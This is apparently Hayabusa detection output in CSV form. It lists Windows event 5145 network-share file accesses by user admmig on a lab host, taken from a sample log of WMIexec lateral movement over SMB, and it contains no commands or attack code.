2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sk  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sr-Latn-RS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sv  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\th  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\tr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\uk  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HANS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HANT  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HK  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs\DevInvCache  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\apppatch64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\Custom  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\Custom\Custom64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\en-US  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppReadiness  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
